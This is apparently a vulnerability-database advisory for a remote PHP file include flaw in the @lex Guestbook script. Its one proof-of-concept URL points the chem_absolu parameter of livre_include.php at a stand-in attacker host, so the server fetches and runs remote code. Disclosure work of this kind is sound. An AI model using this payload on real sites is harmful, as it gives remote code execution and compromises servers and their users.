• info
• discussion
• exploit
• solution
• references

@lexPHPTeam @lex Guestbook Remote PHP File Include Vulnerability

No exploit is required.

The following proof of concept has been supplied:
http://www.example.com/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f